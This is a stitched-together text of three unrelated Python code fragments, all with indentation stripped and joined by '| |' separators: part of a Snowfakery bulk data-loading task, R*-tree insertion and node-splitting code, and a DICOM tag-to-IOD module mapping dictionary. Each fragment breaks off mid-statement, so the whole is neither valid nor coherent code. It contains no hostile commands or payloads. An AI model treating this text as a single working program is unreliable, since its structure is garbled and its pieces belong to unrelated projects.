self.num_generator_workers = int(self.num_generator_workers)
self.ignore_row_errors = process_bool_arg(
self.options.get("ignore_row_errors", False)
)
loading_rules = process_list_arg(self.options.get("loading_rules")) or []
self.loading_rules = [Path(path) for path in loading_rules if path]
self.recipe_options = process_list_of_pairs_dict_arg(
self.options.get("recipe_options") or {}
)
self.bulk_mode = self.options.get("bulk_mode", "Parallel").title()
if self.bulk_mode and self.bulk_mode not in ["Serial", "Parallel"]:
raise TaskOptionsError("bulk_mode must be either Serial or Parallel")
def _init_channel_configs(self, recipe):
"""The channels describe the 'shape' of the communication
The normal case is a single, parallelized, bulk channel,
multi-threaded on client and server, using a single user
account.
Using .load.yml you can add more channels, utilizing
more user accounts which can speed up throughput in
a few cases.
This method reads files and options to determine
what channels should be created later.
"""
channel_decls = read_channel_declarations(recipe, self.loading_rules)
if channel_decls:
self.channel_configs = channel_configs_from_decls(
channel_decls, self.project_config.keychain
)
elif self.bulk_mode == "Serial":
self.channel_configs = [
standard_channel_config(
self.org_config,
self.recipe_options,
1,
1,
)
]
else:
self.channel_configs = [
standard_channel_config(
self.org_config,
self.recipe_options,
self.num_generator_workers,
None,
)
]
def setup(self):
"""Setup for loading."""
self.debug_mode = get_debug_mode()
if not self.num_generator_workers:
# logical CPUs do not really improve performance of CPU-bound
# code, so we ignore them.
self.num_generator_workers = psutil.cpu_count(logical=False)
if self.debug_mode:
self.logger.info(f"Using {self.num_generator_workers} workers")
self.run_until = determine_run_until(self.options, self.sf)
self.start_time = time.time()
self.recipe = Path(self.options.get("recipe"))
self.sobject_counts = defaultdict(RunningTotals)
self._init_channel_configs(self.recipe)
## Todo: Consider when this process runs longer than 2 Hours,
# what will happen to my sf connection?
def _run_task(self):
self.setup()
portions = PortionGenerator(
self.run_until.gap,
MIN_PORTION_SIZE,
MAX_PORTION_SIZE,
)
working_directory = self.options.get("working_directory")
with self.workingdir_or_tempdir(working_directory) as working_directory:
self._setup_channels_and_queues(working_directory)
self.logger.info(f"Working directory is {working_directory}")
if self.run_until.nothing_to_do:
self.logger.info(
f"Dataload is finished before it started! {self.run_until.nothing_to_do_because}"
)
return
template_path, relevant_sobjects = self._generate_and_load_initial_batch(
working_directory
)
# disable OrgReordCounts for now until it's reliability can be better
# tested and documented.
# Retrieve OrgRecordCounts code from
# https://github.com/SFDO-Tooling/CumulusCI/commit/7d703c44b94e8b21f165e5538c2249a65da0a9eb#diff-54676811961455410c30d9c9405a8f3b9d12a6222a58db9d55580a2da3cfb870R147
self._loop(
template_path,
working_directory,
None,
portions,
)
self.finish()
def _setup_channels_and_queues(self, working_directory):
"""Set up all of the channels and queues.
In particular their directories and the in-memory
runtime datastructures.
Each channel can hold multiple queues.
"""
subtask_configurator = SubtaskConfigurator(
self.recipe, self.run_until, self.ignore_row_errors, self.bulk_mode
)
self.queue_manager = SnowfakeryChannelManager(
project_config=self.project_config,
logger=self.logger,
subtask_configurator=subtask_configurator,
)
if len(self.channel_configs) == 1:
channel = self.channel_configs[0]
self.queue_manager.add_channel(
org_config=channel.org_config,
num_generator_workers=channel.declaration.num_generators,
num_loader_workers=channel.declaration.num_loaders,
working_directory=working_directory,
recipe_options=channel.declaration.recipe_options,
)
else:
self.configure_multiple_channels(working_directory)
def configure_multiple_channels(self, working_directory):
"""If there is more than one channel (=user account),
pre-allocate work among them.
"""
allocated_generator_workers = sum(
(channel.declaration.num_generators or 0)
for channel in self.channel_configs
)
channels_without_workers = len(
[
channel.declaration.num_generators
for channel in self.channel_configs
if not channel.declaration.num_generators
]
)
remaining_generator_workers = (
self.num_generator_workers - allocated_generator_workers
)
num_generators_per_channel = ceil(
remaining_generator_workers / channels_without_workers
)
for idx, channel in enumerate(self.channel_configs):
if self.debug_mode:
self.logger.info("Initializing %s", channel)
channel_wd = working_directory / f"channel_{idx}"
channel_wd.mkdir()
recipe_options = channel.merge_recipe_options(self.recipe_options)
generator_workers = (
channel.declaration.num_generators or num_generators_per_channel
)
self.queue_manager.add_channel(
org_config=channel.org_config,
num_generator_workers=generator_workers,
num_loader_workers=channel.declaration.num_loaders,
working_directory=channel_wd,
recipe_options=recipe_options,
)
def _loop(
self,
template_path,
tempdir,
org_record_counts_thread,
portions: PortionGenerator,
):
"""The inner loop that controls when data is generated and when we are done."""
upload_status = self.get_upload_status(
portions.next_batch_size,
)
while not portions.done(upload_status.total_sets_working_on_or_uploaded):
if self.debug_mode:
self.logger.info(f"Working Directory: {tempdir}")
self.queue_manager.tick(
upload_status,
template_path,
tempdir,
portions,
self.get_upload_status,
)
self.update_running_totals()
self.print_running_totals()
time.sleep(WAIT_TIME)
upload_status = self._report_status(
portions.batch_size,
org_record_counts_thread,
template_path,
)
return upload_status
def _report_status(
self,
batch_size,
org_record_counts_thread,
template_path,
):
"""Let the user know what is going on."""
self.logger.info(
"\n********** PROGRESS *********",
)
upload_status = self.get_upload_status(
batch_size or 0,
)
self.logger.info(upload_status._display(detailed=self.debug_mode))
if upload_status.sets_failed:
# TODO: this is not sufficiently tested.
# commenting it out doesn't break tests
self.log_failures()
if upload_status.sets_failed > ERROR_THRESHOLD:
raise exc.BulkDataException(
f"Errors exceeded threshold: {upload_status.sets_failed} vs {ERROR_THRESHOLD}"
)
# TODO: Retrieve OrgRecordCounts code from
# https://github.com/SFDO-Tooling/CumulusCI/commit/7d703c44b94e8b21f165e5538c2249a65da0a9eb#diff-54676811961455410c30d9c9405a8f3b9d12a6222a58db9d55580a2da3cfb870R147
return upload_status
def update_running_totals(self) -> None:
"""Read and collate result reports from sub-processes/sub-threads
This is a realtime reporting channel which could, in theory, be updated
before sub-tasks finish. Currently no sub-tasks are coded to do that.
The logical next step is to allow LoadData to monitor steps one by
one or even batches one by one.
Note that until we implement that, we are paying the complexity
cost of a real-time channel but not getting the benefits of it.
"""
while True:
try:
results = self.queue_manager.get_results_report()
except Empty:
break
if "results" in results and "step_results" in results["results"]:
self.update_running_totals_from_load_step_results(results["results"])
elif "error" in results:
self.logger.warning(f"Error in load: {results}")
else: # pragma: no cover
self.logger.warning(f"Unexpected message from subtask: {results}")
def update_running_totals_from_load_step_results(self, results: dict) | |
low_y_distributions, upper_y_distributions = result
# consider cross-group overlap and combined area
candidate_distributions = None
if axis == 0:
candidate_distributions = low_x_distributions + upper_x_distributions
elif axis == 1:
candidate_distributions = low_y_distributions + upper_y_distributions
mbr_list_pair_tagged_candidate_distributions = [(([y.getMBR() for y in x[0]], [y.getMBR() for y in x[1]]), x) for x in candidate_distributions]
mbr_pair_tagged_candidate_distributions = [((CompositeMBR.makeMBR(x[0][0]), CompositeMBR.makeMBR(x[0][1])), x[1]) for x in mbr_list_pair_tagged_candidate_distributions]
overlap_value_tagged_candidate_distributions = [(MBR.findOverlapArea(x[0][0], x[0][1]), x[1]) for x in mbr_pair_tagged_candidate_distributions]
overlap_values = [x[0] for x in overlap_value_tagged_candidate_distributions]
min_overlap_value = min(overlap_values)
# print "overlap values:", overlap_values, min_overlap_value
matching_overlap_value_tagged_candidate_distributions = [x for x in overlap_value_tagged_candidate_distributions if x[0] == min_overlap_value]
next_next_candidates = [x[1] for x in matching_overlap_value_tagged_candidate_distributions]
# print next_next_candidates
if len(matching_overlap_value_tagged_candidate_distributions) > 1:
next_candidate_distributions = next_next_candidates
mbr_list_pair_tagged_candidate_distributions = [(([y.getMBR() for y in x[0]], [y.getMBR() for y in x[1]]), x) for x in next_candidate_distributions]
mbr_pair_tagged_next_candidate_distributions = [((CompositeMBR.makeMBR(x[0][0]), CompositeMBR.makeMBR(x[0][1])), x[1]) for x in mbr_list_pair_tagged_candidate_distributions]
combined_area_tagged_next_candidate_distributions = [(x[0][0].getArea() + x[0][1].getArea(), x[1]) for x in mbr_pair_tagged_next_candidate_distributions]
combined_area_values = [x[0] for x in combined_area_tagged_next_candidate_distributions]
# print "combined area values:", combined_area_values
# raise Exception()
min_combined_area_value = min(combined_area_values)
matching_combined_area_tagged_next_candidate_distributions = [x for x in combined_area_tagged_next_candidate_distributions if x[0] == min_combined_area_value]
next_next_candidates = [x[1] for x in matching_combined_area_tagged_next_candidate_distributions]
chosen_distribution_pair = next_next_candidates[0]
# print "chosen distribution pair:", chosen_distribution_pair
return chosen_distribution_pair
# we assume that >= 2 entries are provided
# we take special precautions to make the two returned entries be different
@staticmethod
def linearPickSeeds(entries):
mbr_list = [x.getMBR() for x in entries]
# largest dead space along any dimension
upper_left_points = [x.getUpperLeft() for x in mbr_list]
lower_right_points = [x.getLowerRight() for x in mbr_list]
points = upper_left_points + lower_right_points
x_values = [x[0] for x in points]
y_values = [x[1] for x in points]
min_x = min(x_values)
max_x = max(x_values)
min_y = min(y_values)
max_y = max(y_values)
x_size = max_x - min_x
y_size = max_y - min_y
x_values_upper_left = [x[0] for x in upper_left_points]
y_values_upper_left = [x[1] for x in upper_left_points]
x_values_lower_right = [x[0] for x in lower_right_points]
y_values_lower_right = [x[1] for x in lower_right_points]
highest_low_side_x = max(x_values_upper_left)
lowest_high_side_x = min(x_values_lower_right)
highest_low_side_y = max(y_values_upper_left)
lowest_high_side_y = min(y_values_lower_right)
x_separation = highest_low_side_x - lowest_high_side_x
y_separation = highest_low_side_y - lowest_high_side_y
normalized_x_separation = x_separation / (1.0 * x_size + 1)
normalized_y_separation = y_separation / (1.0 * y_size + 1)
x_responsible_mbr_candidates1 = [x for x in mbr_list if x.getUpperLeft()[0] == highest_low_side_x]
chosen_x_responsible_mbr_candidate1 = x_responsible_mbr_candidates1[0]
x_responsible_mbr_candidates2 = [x for x in mbr_list if x.getLowerRight()[0] == lowest_high_side_x]
winnowed_x_responsible_mbr_candidates2 = [x for x in x_responsible_mbr_candidates2 if x != chosen_x_responsible_mbr_candidate1]
chosen_x_responsible_mbr_candidate2 = winnowed_x_responsible_mbr_candidates2[0]
y_responsible_mbr_candidates1 = [x for x in mbr_list if x.getUpperLeft()[1] == highest_low_side_y]
chosen_y_responsible_mbr_candidate1 = y_responsible_mbr_candidates1[0]
y_responsible_mbr_candidates2 = [x for x in mbr_list if x.getLowerRight()[1] == lowest_high_side_y]
winnowed_y_responsible_mbr_candidates2 = [x for x in y_responsible_mbr_candidates2 if x != chosen_y_responsible_mbr_candidate1]
chosen_y_responsible_mbr_candidate2 = winnowed_y_responsible_mbr_candidates2[0]
chosen_x_responsible_entry_candidates1 = [x for x in entries if x.getMBR() == chosen_x_responsible_mbr_candidate1]
chosen_x_responsible_entry_candidates2 = [x for x in entries if x.getMBR() == chosen_x_responsible_mbr_candidate2]
chosen_y_responsible_entry_candidates1 = [x for x in entries if x.getMBR() == chosen_y_responsible_mbr_candidate1]
chosen_y_responsible_entry_candidates2 = [x for x in entries if x.getMBR() == chosen_y_responsible_mbr_candidate2]
chosen_x_entry1 = chosen_x_responsible_entry_candidates1[0]
chosen_x_entry2 = chosen_x_responsible_entry_candidates2[0]
chosen_y_entry1 = chosen_y_responsible_entry_candidates1[0]
chosen_y_entry2 = chosen_y_responsible_entry_candidates2[0]
if normalized_y_separation >= normalized_x_separation:
return (chosen_y_entry1, chosen_y_entry2)
elif normalized_x_separation > normalized_y_separation:
# there was an error here
return (chosen_x_entry1, chosen_x_entry2)
def chooseLeaf(self, entry):
return self.chooseLeafHelper(entry, self.getRootEntry().getChild())
def chooseLeafHelper(self, entry, node):
if node.isLeafNode() == True:
if node == self.getRootEntry().getChild():
return node
else:
return node.getParent()
else:
entries = node.getEntries()
candidate_entries = self.chooseEntriesWithMinimalAreaEnlargement(entries, entry)
if len(candidate_entries) != 1:
# resolve a tie
candidate_entries = self.resolveEnlargementTie(candidate_entries, entry)
chosen_entry = candidate_entries[0]
chosen_child = chosen_entry.getChild()
return self.chooseLeafHelper(entry, chosen_child)
def rstarChooseLeaf(self, entry):
return self.rstarChooseLeafHelper(entry, self.getRootEntry().getChild())
def rstarChooseLeafHelper(self, entry, node):
if node.isLeafNode() == True:
if node == self.getRootEntry().getChild():
return node
else:
return node.getParent()
else:
entries = node.getEntries()
candidate_entries = None
# if node.isLeafNode() == True:
candidate_entries = self.chooseEntriesWithMinimalOverlapEnlargement(entries, entry)
if len(candidate_entries) != 1:
# resolve a tie
candidate_entries = self.chooseEntriesWithMinimalAreaEnlargement(candidate_entries, entry)
if len(candidate_entries) != 1:
# resolve a tie
candidate_entries = self.resolveEnlargementTie(candidate_entries, entry)
"""
else:
candidate_entries = self.chooseEntriesWithMinimalAreaEnlargement(entries, entry)
if len(candidate_entries) != 1:
# resolve a tie
candidate_entries = self.resolveEnlargementTie(candidate_entries, entry)
"""
chosen_entry = candidate_entries[0]
chosen_child = chosen_entry.getChild()
return self.rstarChooseLeafHelper(entry, chosen_child)
def insert(self, entry):
# print entry.getMBR().toString()
# print entry.getMBR().getUpperLeft()[0]
# if abs(entry.getMBR().getUpperLeft()[0] - 988266.168186) < 0.1:
# if abs(entry.getMBR().getUpperLeft()[0] - 185061.9338) < 0.1:
# if abs(entry.getMBR().getUpperLeft()[0] - 75898.2202098) < 0.1:
"""
if abs(entry.getMBR().getUpperLeft()[0] - 185061.9338) < 0.1:
# raise Exception()
pass
"""
# print "inserting an entry"
"""
if self.hasConsistentNonTraditionalLeafDepthValues() == False and self.getRootEntry().getChild().isLeafNode() == False:
# raise Exception()
pass
"""
"""
if self.getRoot().getNumChildren() > self.getRoot().getMaximumNumEntriesPerNode():
raise Exception()
"""
"""
encountered_item = False
# if entry.getMBR().getContainedItem() == (962736.900780, 317162.3926449):
if entry.getMBR().getContainedItem()[0] == 835394.40839:
encountered_item = True
if encountered_item == True:
print self.toString()
raise Exception()
"""
leaf_node = self.rstarChooseLeaf(entry)
adjust_result = None
# print "leaf is full:", leaf_node.isFull()
if leaf_node.isFull() == False:
# leaf_node.setIsLeafNode(True)
# do not have to split node
leaf_node.addEntry(entry)
# this may be unnecessary
entry.getChild().setParent(leaf_node)
# print "leaf node entries:", leaf_node.getEntries()
# print "added an entry to a leaf:", entry
# print "leaf node:", leaf_node
# print "root node:", self.getRoot()
# print leaf_node == self.getRoot()
# print leaf_node.toString()
# entry.getChild().setParent(leaf_node)
# call adjustTree to resize bounding boxes of current node and ancestors and propagate splits
# RTree.rstarPreadjustTree(self, leaf_node)
adjust_result = RTree.rstarAdjustTree(self, leaf_node, [entry], False)
else:
# split node
# split_result = self.rstarSplitNode(leaf_node.getChildren()[0], entry)
split_result = self.rstarSplitNode(leaf_node, entry)
# l and ll are internal nodes
l, ll, e, ee = split_result
# print leaf_node == self.getRoot()
# print leaf_node.getParent().getEntries(), e, ee
# if leaf_node != self.getRoot() and leaf_node.getParent() != None:
if leaf_node.getParent() != None:
# adjust fields related to existence of a parent
"""
parent = leaf_node.getParent()
leaf_entry = parent.retrieveEntryForChild(leaf_node)
index = parent.getIndexForEntry(leaf_entry)
parent.removeIthEntry(index)
parent.addEntry(e)
parent.addEntry(ee)
l.setParent(parent)
ll.setParent(parent)
"""
pass
else:
# split but do not have parent; so, we create one
pass
# print "split node is root"
"""
next_root = RTreeNode(None, [e, ee], False)
l.setParent(next_root)
ll.setParent(next_root)
# next_root.addEntry(e)
# next_root.addEntry(ee)
self.setRoot(next_root)
"""
# we might be able to handle propagating the first split manually,
# and we would continue as if we currently have no split to propagate
# e and ee are for entries for the two children that result from split of pre-cursor to l
# RTree.rstarPreadjustTree(self, l)
adjust_result = RTree.rstarAdjustTree(self, l, [e, ee], True)
# check result of tree-adjust to see whether we plan on splitting root
# in case the root has to be split, create a new root
# increase the height of the tree by one
# grow tree taller
ended_with_split2, resulting_entries_from_split = adjust_result
# return from an "adjust" action is always to do with root
# print "ended with split:", ended_with_split2
# we ended adjust-tree by requiring a split of root
if ended_with_split2 == True:
# return
# raise Exception()
e, ee = resulting_entries_from_split
l = e.getChild()
ll = ee.getChild()
# print "num. of entries:", tree.getRoot().getNumEntries()
if (self.getRootEntry().getChild().getNumEntries() + 1) <= self.getRootEntry().getChild().getMaximumNumEntriesPerNode():
# there is space at root
# tree.getRoot().addEntry(e)
# raise Exception()
self.getRootEntry().getChild().addEntry(ee)
# l.setParent(tree.getRoot())
ll.setParent(self.getRootEntry().getChild())
else:
# split_result = tree.rstarSplitNode(tree.getRoot().getChildren()[0], ee)
split_result = self.rstarSplitNode(self.getRootEntry().getChild(), ee)
l, ll, e, ee = split_result
# e, ee = resulting_entries_from_split
# print "resulting entries:", resulting_entries_from_split
resulting_entries_from_split = [e, ee]
next_root = RTreeNode(None, resulting_entries_from_split, False)
# next_root.addEntry(e)
# next_root.addEntry(ee)
"""
l = e.getChild()
ll = ee.getChild()
"""
l.setParent(next_root)
ll.setParent(next_root)
# print "have a next root:", next_root
self.getRootEntry().setChild(next_root)
# print "modified root as part of an insert"
else:
# print "entries included:", e in l.getParent().getEntries()
pass
# make available two nodes l and ll
# and make available two entries e and ee
# "node" is the node that we split
# by additionally introducing entry "entry"
# we also add the created entries to parent
def rstarSplitNode(self, node, entry):
curr_node = node
E_overall = list(set(curr_node.getEntries() + [entry]))
return self.rstarSplitNodeHelper(node, E_overall, entry)
def rstarSplitNodeHelper(self, node, E_overall, entry):
# print "splitting a node"
# print "pre-split-node tree:", tree.toNumChildrenString()
# print node == self.getRoot()
# print node.getNumEntries()
# find | |
BYTE SC IMAGE IOD': ['Study'],
'COMPREHENSIVE SR IOD': ['Study'],
'ENHANCED ULTRASOUND VOLUME IOD': ['Study'],
'KEY OBJECT SELECTION DOCUMENT IOD': ['Study'],
'SPATIAL FIDUCIALS IOD': ['Study'],
'RT ION PLAN IOD': ['Study'],
'X-RAY ANGIOGRAPHIC IMAGE IOD': ['Study'],
'CT IMAGE IOD': ['Study'],
'VL WHOLE SLIDE MICROSCOPY IOD': ['Study'],
'RT ION BEAMS TREATMENT RECORD IOD': ['Study'],
'OPHTHALMIC VISUAL FIELD STATIC PERIMETRY MEASUREMENTS IOD': ['Study'],
'XA/XRF GRAYSCALE SOFTCOPY PRESENTATION STATE IOD': ['Study'],
'RT DOSE IOD': ['Study'],
'AMBULATORY ECG IOD': ['Study'],
'SURFACE SEGMENTATION IOD': ['Study'],
'MAMMOGRAPHY CAD SR IOD': ['Study'],
'VL MICROSCOPIC IMAGE IOD': ['Study'],
'RT BEAMS TREATMENT RECORD IOD': ['Study'],
'DEFORMABLE SPATIAL REGISTRATION IOD': ['Study'],
'VIDEO PHOTOGRAPHIC IMAGE IOD': ['Study'],
'RT IMAGE IOD': ['Study'],
'SC IMAGE IOD': ['Study'],
None: ['Study', 'Modality Performed Procedure Step'],
'SEGMENTATION IOD': ['Study'],
'PET IMAGE IOD': ['Study'],
'PSEUDO-COLOR SOFTCOPY PRESENTATION STATE IOD': ['Study'],
'DIGITAL X-RAY IMAGE IOD': ['Study'],
'REAL WORLD VALUE MAPPING IOD': ['Study'],
'SPATIAL REGISTRATION IOD': ['Study'],
'COLON CAD SR IOD': ['Study'],
'INTRAVASCULAR OCT IMAGE IOD': ['Study'],
'COLOR SOFTCOPY PRESENTATION STATE IOD': ['Study'],
'GRAYSCALE SOFTCOPY PRESENTATION STATE IOD': ['Study'],
'ENHANCED PET IMAGE IOD': ['Study'],
'VISUAL ACUITY MEASUREMENTS IOD': ['Study'],
'US MULTI-FRAME IMAGE IOD': ['Study'],
'ENHANCED X-RAY RF IMAGE IOD': ['Study'],
'RT BEAMS DELIVERY INSTRUCTION IOD': ['Study'],
'SUBJECTIVE REFRACTION MEASUREMENTS IOD': ['Study'],
'US IMAGE IOD': ['Study'],
'GENERAL ECG IOD': ['Study'],
'XRF IMAGE IOD': ['Study'],
'ENCAPSULATED CDA IOD': ['Study'],
'ENHANCED SR IOD': ['Study'],
'VL PHOTOGRAPHIC IMAGE IOD': ['Study'],
'GENERAL AUDIO WAVEFORM IOD': ['Study'],
'MR IMAGE IOD': ['Study'],
'OPHTHALMIC TOMOGRAPHY IMAGE IOD': ['Study'],
'VIDEO ENDOSCOPIC IMAGE IOD': ['Study'],
'ARTERIAL PULSE WAVEFORM IOD': ['Study'],
},
# OverallTemplateSpatialTolerance
0x006862A5L: {
'GENERIC IMPLANT TEMPLATE IOD': ['Implant Template'],
None: ['Implant Template'],
},
# MRAcquisitionType
0x00180023L: {
'ENHANCED MR COLOR IMAGE IOD': ['Image'],
'ENHANCED MR IMAGE IOD': ['Image'],
'MR IMAGE IOD': ['Image'],
None: ['Image'],
},
# NumberOfTimeSlots
0x00540071L: {
'NM IMAGE IOD': ['Image'],
'PET IMAGE IOD': ['Series'],
None: ['Image', 'Series'],
},
# FrequencyCorrection
0x00189101L: {
'MR SPECTROSCOPY IOD': ['Equipment'],
None: ['Equipment'],
},
# OperatorIdentificationSequence
0x00081072L: {
'BASIC STRUCTURED DISPLAY IOD': ['Series'],
'MULTI-FRAME TRUE COLOR SC IMAGE IOD': ['Series'],
'VL PHOTOGRAPHIC IMAGE IOD': ['Series'],
None: ['Series'],
'SEGMENTATION IOD': ['Series'],
'BASIC VOICE AUDIO IOD': ['Series'],
'OPHTHALMIC PHOTOGRAPHY 16 BIT IMAGE IOD': ['Series'],
'MULTI-FRAME GRAYSCALE BYTE SC IMAGE IOD': ['Series'],
'SC IMAGE IOD': ['Series'],
'GENERAL ECG IOD': ['Series'],
'XA/XRF GRAYSCALE SOFTCOPY PRESENTATION STATE IOD': ['Series'],
'ENHANCED X-RAY ANGIOGRAPHIC IMAGE IOD': ['Series'],
'DIGITAL X-RAY IMAGE IOD': ['Series'],
'OPHTHALMIC PHOTOGRAPHY 8 BIT IMAGE IOD': ['Series'],
'SPATIAL FIDUCIALS IOD': ['Series'],
'DIGITAL INTRA-ORAL X-RAY IMAGE IOD': ['Series'],
'MULTI-FRAME GRAYSCALE WORD SC IMAGE IOD': ['Series'],
'RAW DATA IOD': ['Series'],
'INTRAVASCULAR OCT IMAGE IOD': ['Series'],
'COLOR SOFTCOPY PRESENTATION STATE IOD': ['Series'],
'REAL WORLD VALUE MAPPING IOD': ['Series'],
'ENHANCED MR IMAGE IOD': ['Series'],
'CT IMAGE IOD': ['Series'],
'OPHTHALMIC TOMOGRAPHY IMAGE IOD': ['Series'],
'NM IMAGE IOD': ['Series'],
'BLENDING SOFTCOPY PRESENTATION STATE IOD': ['Series'],
'VISUAL ACUITY MEASUREMENTS IOD': ['Series'],
'PSEUDO-COLOR SOFTCOPY PRESENTATION STATE IOD': ['Series'],
'US MULTI-FRAME IMAGE IOD': ['Series'],
'SUBJECTIVE REFRACTION MEASUREMENTS IOD': ['Series'],
'STEREOMETRIC RELATIONSHIP IOD': ['Series'],
'BASIC CARDIAC EP IOD': ['Series'],
'X-RAY ANGIOGRAPHIC IMAGE IOD': ['Series'],
'PET IMAGE IOD': ['Series'],
'LENSOMETRY MEASUREMENTS IOD': ['Series'],
'MR SPECTROSCOPY IOD': ['Series'],
'DEFORMABLE SPATIAL REGISTRATION IOD': ['Series'],
'OPHTHALMIC VISUAL FIELD STATIC PERIMETRY MEASUREMENTS IOD': ['Series'],
'ENHANCED ULTRASOUND VOLUME IOD': ['Series'],
'RT BEAMS DELIVERY INSTRUCTION IOD': ['Series'],
'X-RAY 3D ANGIOGRAPHIC IMAGE IOD': ['Series'],
'VIDEO ENDOSCOPIC IMAGE IOD': ['Series'],
'ARTERIAL PULSE WAVEFORM IOD': ['Series'],
'VIDEO MICROSCOPIC IMAGE IOD': ['Series'],
'HEMODYNAMIC IOD': ['Series'],
'OPHTHALMIC AXIAL MEASUREMENTS IOD': ['Series'],
'DIGITAL MAMMOGRAPHY X-RAY IMAGE IOD': ['Series'],
'US IMAGE IOD': ['Series'],
'AMBULATORY ECG IOD': ['Series'],
'VL WHOLE SLIDE MICROSCOPY IOD': ['Series'],
'12-LEAD ECG IOD': ['Series'],
'MR IMAGE IOD': ['Series'],
'ENHANCED MR COLOR IMAGE IOD': ['Series'],
'ENHANCED CT IMAGE IOD': ['Series'],
'XRF IMAGE IOD': ['Series'],
'RESPIRATORY WAVEFORM IOD': ['Series'],
'GENERAL AUDIO WAVEFORM IOD': ['Series'],
'GRAYSCALE SOFTCOPY PRESENTATION STATE IOD': ['Series'],
'AUTOREFRACTION MEASUREMENTS IOD': ['Series'],
'SURFACE SEGMENTATION IOD': ['Series'],
'VL SLIDE-COORDINATES MICROSCOPIC IMAGE IOD': ['Series'],
'VL MICROSCOPIC IMAGE IOD': ['Series'],
'SPATIAL REGISTRATION IOD': ['Series'],
'ENHANCED PET IMAGE IOD': ['Series'],
'ENHANCED X-RAY RF IMAGE IOD': ['Series'],
'MULTI-FRAME SINGLE BIT SC IMAGE IOD': ['Series'],
'INTRAOCULAR LENS CALCULATIONS IOD': ['Series'],
'VIDEO PHOTOGRAPHIC IMAGE IOD': ['Series'],
'X-RAY 3D CRANIOFACIAL IMAGE IOD': ['Series'],
'VL ENDOSCOPIC IMAGE IOD': ['Series'],
'KERATOMETRY MEASUREMENTS IOD': ['Series'],
'BREAST TOMOSYNTHESIS IMAGE IOD': ['Series'],
'CR IMAGE IOD': ['Series'],
},
# FirstALineLocation
0x00520034L: {
'INTRAVASCULAR OCT IMAGE IOD': ['Image'],
None: ['Image'],
},
# ReferencedStorageMediaSequence
0x2200000DL: {
'MEDIA CREATION MANAGEMENT IOD': ['Media Creation Management'],
None: ['Media Creation Management'],
},
# AcquisitionDuration
0x00189073L: {
'INTRAVASCULAR OCT IMAGE IOD': ['Image'],
'ENHANCED MR IMAGE IOD': ['Image'],
None: ['Image', 'Equipment'],
'ENHANCED PET IMAGE IOD': ['Image'],
'ENHANCED ULTRASOUND VOLUME IOD': ['Image'],
'OPHTHALMIC TOMOGRAPHY IMAGE IOD': ['Image'],
'ENHANCED X-RAY RF IMAGE IOD': ['Image'],
'ENHANCED X-RAY ANGIOGRAPHIC IMAGE IOD': ['Image'],
'ENHANCED MR COLOR IMAGE IOD': ['Image'],
'VL WHOLE SLIDE MICROSCOPY IOD': ['Image'],
'MR SPECTROSCOPY IOD': ['Equipment'],
'ENHANCED CT IMAGE IOD': ['Image'],
},
# ImagedVolumeWidth
0x00480001L: {
'VL WHOLE SLIDE MICROSCOPY IOD': ['Image'],
None: ['Image'],
},
# ALinePixelSpacing
0x00520014L: {
'INTRAVASCULAR OCT IMAGE IOD': ['Image'],
None: ['Image'],
},
# RadiopharmaceuticalInformationSequence
0x00540016L: {
'NM IMAGE IOD': ['Image'],
'ENHANCED PET IMAGE IOD': ['Image'],
'PET IMAGE IOD': ['Series'],
None: ['Image', 'Series'],
},
# AcquisitionStartConditionData
0x00180074L: {
'PET IMAGE IOD': ['Series'],
None: ['Series'],
},
# MultipleCopiesFlag
0x00404006L: {
'GENERAL PURPOSE SCHEDULED PROCEDURE STEP IOD': ['General Purpose Scheduled Procedure Step'],
None: ['General Purpose Scheduled Procedure Step'],
},
# WholeBodyTechnique
0x00181301L: {
'NM IMAGE IOD': ['Image'],
None: ['Image'],
},
# ShortTermFluctuation
0x00240075L: {
'OPHTHALMIC VISUAL FIELD STATIC PERIMETRY MEASUREMENTS IOD': ['Measurements'],
None: ['Measurements'],
},
# HPGLDocumentSequence
0x006862C0L: {
'GENERIC IMPLANT TEMPLATE IOD': ['Implant Template'],
None: ['Implant Template'],
},
# VerticesOfThePolygonalCollimator
0x00181720L: {
None: ['Image'],
'DIGITAL INTRA-ORAL X-RAY IMAGE IOD': ['Image'],
'DIGITAL MAMMOGRAPHY X-RAY IMAGE IOD': ['Image'],
'X-RAY ANGIOGRAPHIC IMAGE IOD': ['Image'],
'DIGITAL X-RAY IMAGE IOD': ['Image'],
'XRF IMAGE IOD': ['Image'],
},
# PixelIntensityRelationshipSign
0x00281041L: {
'DIGITAL MAMMOGRAPHY X-RAY IMAGE IOD': ['Image'],
'DIGITAL X-RAY IMAGE IOD': ['Image'],
'DIGITAL INTRA-ORAL X-RAY IMAGE IOD': ['Image'],
'RT IMAGE IOD': ['Image'],
None: ['Image'],
},
# ReferencedOtherPlaneSequence
0x00089410L: {
'ENHANCED X-RAY RF IMAGE IOD': ['Image'],
'ENHANCED X-RAY ANGIOGRAPHIC IMAGE IOD': ['Image'],
None: ['Image'],
},
# GeneralPurposeScheduledProcedureStepStatus
0x00404001L: {
'GENERAL PURPOSE SCHEDULED PROCEDURE STEP IOD': ['General Purpose Scheduled Procedure Step'],
None: ['General Purpose Scheduled Procedure Step'],
},
# NominalInterval
0x00181062L: {
'US MULTI-FRAME IMAGE IOD': ['Image'],
'US IMAGE IOD': ['Image'],
'PET IMAGE IOD': ['Image'],
'MR IMAGE IOD': ['Image'],
None: ['Image'],
},
# NumberOfPhaseEncodingSteps
0x00180089L: {
'MR IMAGE IOD': ['Image'],
None: ['Image'],
},
# StructureSetLabel
0x30060002L: {
'RT STRUCTURE SET IOD': ['Structure Set'],
'RT DOSE IOD': ['Dose'],
None: ['Structure Set', 'Dose'],
},
# VisualFieldMeanSensitivity
0x00240070L: {
'OPHTHALMIC VISUAL FIELD STATIC PERIMETRY MEASUREMENTS IOD': ['Measurements'],
None: ['Measurements'],
},
# StageName
0x00082120L: {
'US MULTI-FRAME IMAGE IOD': ['Image'],
'US IMAGE IOD': ['Image'],
None: ['Image'],
},
# AuthorObserverSequence
0x0040A078L: {
'SPECTACLE PRESCIPTION REPORT IOD': ['Document'],
'ENHANCED SR IOD': ['Document'],
'MAMMOGRAPHY CAD SR IOD': ['Document'],
'BASIC TEXT SR IOD': ['Document'],
'X-RAY RADIATION DOSE SR IOD': ['Document'],
'PROCEDURE LOG IOD': ['Document'],
'CHEST CAD SR IOD': ['Document'],
'MACULAR GRID THIICKNESS AND VOLUME REPORT IOD': ['Document'],
None: ['Document'],
'IMPLANTATION PLAN SR DOCUMENT IOD': ['Document'],
'COMPREHENSIVE SR IOD': ['Document'],
'COLON CAD SR IOD': ['Document'],
},
# ScatterFractionFactor
0x00541323L: {
'PET IMAGE IOD': ['Image'],
